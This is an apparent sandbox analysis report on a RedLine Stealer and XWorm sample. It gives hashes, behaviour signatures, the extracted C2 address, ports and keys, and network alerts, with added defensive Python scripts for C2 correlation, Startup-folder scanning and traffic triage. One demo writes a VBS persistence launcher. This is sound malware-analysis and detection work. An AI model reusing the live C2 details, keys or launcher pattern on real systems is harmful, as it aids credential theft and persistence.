Windows Analysis Report
7xonkSJwuY.exe

Overview

General Information

Sample name: 7xonkSJwuY.exe
renamed because original name is a hash value
Original sample name: 36881de84e2d129a6a32e7a5c5537aee.exe
Analysis ID: 1538405
MD5: 36881de84e2d129a6a32e7a5c5537aee
SHA1: 7e022793522c1f22103a5946ac4b204f3ab58706
SHA256: 9378bcf50d0a58428c5b2f7fd2284579927a48fd2e9d8f4f8395f932cb3db1a6
Tags: exe, RedLineStealer, user-abuse_ch

Detection

RedLine, XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected RedLine Stealer
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Contains functionality to detect sleep reduction / modifications
Contains functionality to log keystrokes (.Net Source)
Drops VBS files to the startup folder
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Name: RedLine Stealer
Description: RedLine Stealer is sold on underground forums either as a standalone purchase ($100/$150 depending on the version) or on a subscription basis ($100/month). It harvests information from browsers such as saved credentials, autocomplete data, and credit card information, and takes a system inventory of the target machine (username, location data, hardware configuration, and installed security software). More recent versions added the ability to steal cryptocurrency. FTP and IM clients are also reportedly targeted, and the malware can upload and download files, execute commands, and periodically send back information about the infected computer.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name: XWorm
Description: Malware with a wide range of capabilities, ranging from RAT to ransomware.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

AV Detection

Source: 2.2.RegSvcs.exe.6be0000.0.raw.unpack Malware Configuration Extractor: RedLine {"C2 url": ["162.251.122.86:5798"], "Bot Id": "success", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe ReversingLabs: Detection: 63%
Source: 7xonkSJwuY.exe ReversingLabs: Detection: 63%
Source: 7xonkSJwuY.exe Virustotal: Detection: 30%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Joe Sandbox ML: detected
Source: 7xonkSJwuY.exe Joe Sandbox ML: detected
Source: 5.2.pteropod.exe.2ec0000.1.raw.unpack String decryptor: 162.251.122.86
Source: 5.2.pteropod.exe.2ec0000.1.raw.unpack String decryptor: 57903
Source: 5.2.pteropod.exe.2ec0000.1.raw.unpack String decryptor: <123456789>
Source: 5.2.pteropod.exe.2ec0000.1.raw.unpack String decryptor: <Xwormmm>
Source: 5.2.pteropod.exe.2ec0000.1.raw.unpack String decryptor: XWorm V5.6
Source: 5.2.pteropod.exe.2ec0000.1.raw.unpack String decryptor: USB.exe
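The two configurations above point at the same host: RedLine reports 162.251.122.86:5798 in its extracted JSON, and the XWorm decrypted strings carry 162.251.122.86 followed by 57903, the XWorm key and splitter markers, the version banner and the USB spreader name. The script below is an added example, not part of the Joe Sandbox report or its extractor: it parses exactly these report lines, pulls the C2 endpoints out of both forms, and groups them by host so that shared infrastructure stands out. The pairing of an IPv4 literal with the next bare integer in the XWorm string list is a heuristic assumed for this example, not the extractor's own logic.

```python
import json
import re
from collections import defaultdict

# Input copied from the AV Detection section of the report above (RedLine extractor
# output and the XWorm string-decryptor strings, in report order).
REPORT_LINES = [
    'Source: 2.2.RegSvcs.exe.6be0000.0.raw.unpack Malware Configuration Extractor: RedLine '
    '{"C2 url": ["162.251.122.86:5798"], "Bot Id": "success", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}',
    'Source: 5.2.pteropod.exe.2ec0000.1.raw.unpack String decryptor: 162.251.122.86',
    'Source: 5.2.pteropod.exe.2ec0000.1.raw.unpack String decryptor: 57903',
    'Source: 5.2.pteropod.exe.2ec0000.1.raw.unpack String decryptor: <123456789>',
    'Source: 5.2.pteropod.exe.2ec0000.1.raw.unpack String decryptor: <Xwormmm>',
    'Source: 5.2.pteropod.exe.2ec0000.1.raw.unpack String decryptor: XWorm V5.6',
    'Source: 5.2.pteropod.exe.2ec0000.1.raw.unpack String decryptor: USB.exe',
]

CONFIG_RE = re.compile(r"^Source: (\S+) Malware Configuration Extractor: (\w+) (\{.*\})$")
DECRYPT_RE = re.compile(r"^Source: (\S+) String decryptor: (.*)$")
IPV4_RE = re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}$")
FAMILY_HINT_RE = re.compile(r"^(XWorm)\b", re.IGNORECASE)


def parse_report(lines):
    """Split report lines into extracted configs and per-dump decrypted strings."""
    configs = []                   # (dump, family, parsed JSON)
    decrypted = defaultdict(list)  # dump -> decrypted strings in report order
    for line in lines:
        m = CONFIG_RE.match(line)
        if m:
            configs.append((m.group(1), m.group(2), json.loads(m.group(3))))
            continue
        m = DECRYPT_RE.match(line)
        if m:
            decrypted[m.group(1)].append(m.group(2))
    return configs, dict(decrypted)


def c2_from_config(family, cfg):
    """The RedLine extractor keeps its C2 list under 'C2 url' as 'host:port' strings."""
    out = []
    for entry in cfg.get("C2 url", []):
        host, _, port = entry.rpartition(":")
        if host and port.isdigit():
            out.append((family, host, int(port)))
    return out


def c2_from_decrypted(strings):
    """Heuristic (an assumption of this example): an IPv4 literal immediately followed by
    a bare integer in the decrypted-string list is read as host, port.  The family name is
    taken from a version banner such as 'XWorm V5.6' when one is present."""
    family = "unknown"
    for s in strings:
        m = FAMILY_HINT_RE.match(s)
        if m:
            family = m.group(1)
    out = []
    for cur, nxt in zip(strings, strings[1:]):
        if IPV4_RE.match(cur) and nxt.isdigit() and 0 <= int(nxt) <= 65535:
            out.append((family, cur, int(nxt)))
    return out


def correlate_c2(lines):
    """Group every recovered C2 endpoint by host: {host: {ports, families}}."""
    configs, decrypted = parse_report(lines)
    endpoints = []
    for _dump, family, cfg in configs:
        endpoints += c2_from_config(family, cfg)
    for strings in decrypted.values():
        endpoints += c2_from_decrypted(strings)
    hosts = defaultdict(lambda: {"ports": set(), "families": set()})
    for family, host, port in endpoints:
        hosts[host]["ports"].add(port)
        hosts[host]["families"].add(family)
    return {h: {"ports": sorted(v["ports"]), "families": sorted(v["families"])}
            for h, v in hosts.items()}


if __name__ == "__main__":
    print(json.dumps(correlate_c2(REPORT_LINES), indent=2))
```

For this sample the result is a single host serving both families on two ports, which is the practical takeaway for blocking: one destination-IP rule covers the RedLine channel on 5798 and the XWorm channel on 57903, while port-based rules would need both.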
Source: 7xonkSJwuY.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: wntdll.pdbUGP source: pteropod.exe, 00000001.00000003.1708097740.0000000004040000.00000004.00001000.00020000.00000000.sdmp, pteropod.exe, 00000001.00000003.1709011475.0000000003EA0000.00000004.00001000.00020000.00000000.sdmp, pteropod.exe, 00000005.00000003.1871597600.0000000003FC0000.00000004.00001000.00020000.00000000.sdmp, pteropod.exe, 00000005.00000003.1875000927.0000000003E20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: pteropod.exe, 00000001.00000003.1708097740.0000000004040000.00000004.00001000.00020000.00000000.sdmp, pteropod.exe, 00000001.00000003.1709011475.0000000003EA0000.00000004.00001000.00020000.00000000.sdmp, pteropod.exe, 00000005.00000003.1871597600.0000000003FC0000.00000004.00001000.00020000.00000000.sdmp, pteropod.exe, 00000005.00000003.1875000927.0000000003E20000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_00452126
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0045C999 FindFirstFileW,FindNextFileW,FindClose, 0_2_0045C999
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00436ADE
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00434BEE
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle, 0_2_00436D2D
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00442E1F
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0045DD7C FindFirstFileW,FindClose, 0_2_0045DD7C
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose, 0_2_0044BD29
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_00475FE5
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_0044BF8D
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose, 1_2_00452126
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_0045C999 FindFirstFileW,FindNextFileW,FindClose, 1_2_0045C999
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose, 1_2_00436ADE
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 1_2_00434BEE
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle, 1_2_00436D2D
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 1_2_00442E1F
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_0045DD7C FindFirstFileW,FindClose, 1_2_0045DD7C
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose, 1_2_0044BD29
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 1_2_00475FE5
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose, 1_2_0044BF8D
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose, 5_2_00452126
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_0045C999 FindFirstFileW,FindNextFileW,FindClose, 5_2_0045C999
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose, 5_2_00436ADE
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 5_2_00434BEE
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle, 5_2_00436D2D
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 5_2_00442E1F
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_0045DD7C FindFirstFileW,FindClose, 5_2_0045DD7C
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose, 5_2_0044BD29
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 5_2_00475FE5
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose, 5_2_0044BF8D
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
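The wscript.exe activity above, together with the "Drops VBS files to the startup folder" and "WScript or CScript Dropper" signatures, describes the persistence mechanism: a script in the user's Startup folder that the Windows Script Host runs at every logon to relaunch the dropped executable. The following scanner is an added example, not code from the report: it lists script-type files in a Startup folder, hashes them for matching against report hashes, and flags launcher-like content. The indicator substrings and the VBS body used in the demo are assumptions constructed for this example (the report does not show the script's contents); the dropped path C:\Users\user\AppData\Local\arrogatingly\pteropod.exe is the one from the report.

```python
import hashlib
import os
import tempfile
from pathlib import Path

# Script extensions the Windows Script Host executes; any of these in a Startup
# folder runs under wscript.exe at logon.
SCRIPT_EXTS = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh"}

# Substrings that make a Startup script worth a second look.  This list is an
# assumption for the example, not a Sigma rule taken from the report.
INDICATORS = ("WScript.Shell", "Shell.Application", "AppData\\Local",
              "AppData\\Roaming", "Temp\\", ".exe", "powershell", "cmd /c")


def startup_folders():
    """Per-user and all-users Startup folders, resolved from the environment so the
    scan also works on a live host; the fallbacks mirror the sandbox paths above."""
    appdata = os.environ.get("APPDATA", r"C:\Users\user\AppData\Roaming")
    programdata = os.environ.get("ProgramData", r"C:\ProgramData")
    return [
        Path(appdata) / "Microsoft/Windows/Start Menu/Programs/Startup",
        Path(programdata) / "Microsoft/Windows/Start Menu/Programs/StartUp",
    ]


def scan_startup(folder):
    """One record per script-type file in `folder`: name, size, SHA-256 (to match
    against the hashes a report lists) and the indicator strings found in its body."""
    records = []
    for path in sorted(Path(folder).iterdir()):
        if not path.is_file() or path.suffix.lower() not in SCRIPT_EXTS:
            continue
        data = path.read_bytes()
        text = data.decode("utf-8", errors="ignore").lower()
        records.append({
            "name": path.name,
            "size": len(data),
            "sha256": hashlib.sha256(data).hexdigest(),
            "indicators": [ind for ind in INDICATORS if ind.lower() in text],
        })
    return records


def scan_all():
    """Scan every Startup folder that exists on this host."""
    return {str(f): scan_startup(f) for f in startup_folders() if f.is_dir()}


def demo():
    """Constructed scenario: a temporary Startup folder holding a launcher VBS (body made
    up for this example; it only mimics the shape of a WScript.Shell launcher pointing at
    the report's dropped pteropod.exe path) next to a harmless desktop.ini."""
    with tempfile.TemporaryDirectory() as tmp:
        folder = Path(tmp)
        (folder / "pteropod.vbs").write_bytes(
            b'Set sh = CreateObject("WScript.Shell")\r\n'
            b'sh.Run """C:\\Users\\user\\AppData\\Local\\arrogatingly\\pteropod.exe""", 0\r\n'
        )
        (folder / "desktop.ini").write_bytes(b"[.ShellClassInfo]\r\n")
        return scan_startup(folder)


if __name__ == "__main__":
    for rec in demo():
        print(rec)
    for folder, recs in scan_all().items():
        print(folder, recs)
```

A file with any of these extensions in a Startup folder is unusual on a managed workstation; the hash is what lets you tie it back to a sandbox report, and the indicator list is only a triage hint, not a verdict.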
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then inc dword ptr [ebp-20h] 2_2_07088400
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0708AF6Eh 2_2_0708AF4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 071466FAh 2_2_07146438
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 07145647h 2_2_07144EE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 07147172h 2_2_07146D46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 071475F2h 2_2_07146D46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0714D278h 2_2_0714CD80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0714AE72h 2_2_0714ABA2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 07143A0Dh 2_2_07143602
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 07143A0Dh 2_2_07143630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 07149EB1h 2_2_07149E99

Networking

Source: Network traffic Suricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.4:49732 -> 162.251.122.86:5798
Source: Network traffic Suricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.4:49732 -> 162.251.122.86:5798
Source: Network traffic Suricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 162.251.122.86:5798 -> 192.168.2.4:49732
Source: Network traffic Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 162.251.122.86:57903 -> 192.168.2.4:49730
Source: Network traffic Suricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 162.251.122.86:57903 -> 192.168.2.4:49730
Source: Network traffic Suricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 162.251.122.86:5798 -> 192.168.2.4:49732
Source: Network traffic Suricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49730 -> 162.251.122.86:57903
Source: Network traffic Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.4:49730 -> 162.251.122.86:57903
Source: Malware configuration extractor URLs: 162.251.122.86:5798
Source: global traffic TCP traffic: 162.251.122.86 ports 0,3,5,7,9,5798,57903
Source: global traffic TCP traffic: 192.168.2.4:49730 -> 162.251.122.86:57903
Source: Joe Sandbox View ASN Name: UNREAL-SERVERSUS
Source: unknown TCP traffic detected without corresponding DNS query: 162.251.122.86 (50 occurrences)
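Two of the network signatures above need no signature content at all: the sample contacts 162.251.122.86 on ports 0, 3, 5, 7, 9, 5798 and 57903 with no DNS query that ever returned that address. Both are generic behaviours (hard-coded C2 IP, many distinct ports on one host) that hold even when the Suricata rule IDs change. The script below is an added example, not part of the report: it runs both checks over a small constructed event list modelled on the report's traffic (the DNS-resolved connection to 203.0.113.10 and the LAN SMB connection are constructed contrast cases that must not fire).

```python
import ipaddress
from collections import defaultdict

# Constructed events modelled on the Networking section above: the sandbox host
# 192.168.2.4 opens TCP connections to 162.251.122.86 on ports 0,3,5,7,9,5798,57903
# without any DNS answer naming that address.  A DNS-resolved connection to a
# documentation-range address and a LAN SMB connection are the benign contrast cases.
EVENTS = [
    {"ts": 1.0, "type": "dns", "src": "192.168.2.4", "qname": "update.example.net", "answers": ["203.0.113.10"]},
    {"ts": 2.0, "type": "tcp", "src": "192.168.2.4", "dst": "203.0.113.10", "dport": 443},
    {"ts": 3.0, "type": "tcp", "src": "192.168.2.4", "dst": "192.168.2.1", "dport": 445},
] + [
    {"ts": 4.0 + i, "type": "tcp", "src": "192.168.2.4", "dst": "162.251.122.86", "dport": port}
    for i, port in enumerate([57903, 5798, 0, 3, 5, 7, 9])
]

# Destinations that legitimately never involve DNS: RFC 1918, loopback, link-local.
LOCAL_NETS = [ipaddress.ip_network(n) for n in
              ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]


def is_local(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in LOCAL_NETS)


def tcp_without_dns(events):
    """Destination IPs contacted over TCP before any DNS answer returned them.
    Events are walked in time order, so a lookup that happens after the connection
    does not retroactively excuse it."""
    resolved, flagged = set(), set()
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["type"] == "dns":
            resolved.update(ev["answers"])
        elif ev["type"] == "tcp" and not is_local(ev["dst"]) and ev["dst"] not in resolved:
            flagged.add(ev["dst"])
    return flagged


def many_ports_same_ip(events, threshold=5):
    """{dst_ip: sorted distinct ports} for every (src, dst) pair that touched at least
    `threshold` TCP ports, the pattern the report scores as likely port scanning."""
    ports = defaultdict(set)
    for ev in events:
        if ev["type"] == "tcp":
            ports[(ev["src"], ev["dst"])].add(ev["dport"])
    return {dst: sorted(ps) for (_src, dst), ps in ports.items() if len(ps) >= threshold}


def triage(events, threshold=5):
    """Hosts that trip both signals; an entry here is a strong C2 candidate."""
    unresolved = tcp_without_dns(events)
    return sorted(ip for ip in many_ports_same_ip(events, threshold) if ip in unresolved)


if __name__ == "__main__":
    print("no DNS:", sorted(tcp_without_dns(EVENTS)))
    print("many ports:", many_ports_same_ip(EVENTS))
    print("triage:", triage(EVENTS))
```

The no-DNS check has a known blind spot on real hosts: a resolver cache or a connection that predates the capture window looks identical to a hard-coded IP, so treat it as a triage signal and confirm against the extracted configuration, as the report does here.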
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0044289D InternetQueryDataAvailable,InternetReadFile, 0_2_0044289D
Source: RegSvcs.exe, 00000002.00000002.1929347646.0000000002989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
Source: RegSvcs.exe, 00000002.00000002.1929347646.0000000002989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
Source: RegSvcs.exe, 00000002.00000002.1929347646.0000000002989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
Source: RegSvcs.exe, 00000002.00000002.1929347646.0000000002989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: RegSvcs.exe, 00000002.00000002.1929347646.0000000002989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: RegSvcs.exe, 00000002.00000002.1929347646.0000000002989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
Source: RegSvcs.exe, 00000002.00000002.1929347646.0000000002989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
Source: RegSvcs.exe, 00000002.00000002.1929347646.0000000002989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
Source: RegSvcs.exe, 00000002.00000002.1929347646.0000000002989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
Source: RegSvcs.exe, 00000002.00000002.1929347646.0000000002989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
Source: RegSvcs.exe, 00000002.00000002.1929347646.0000000002989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
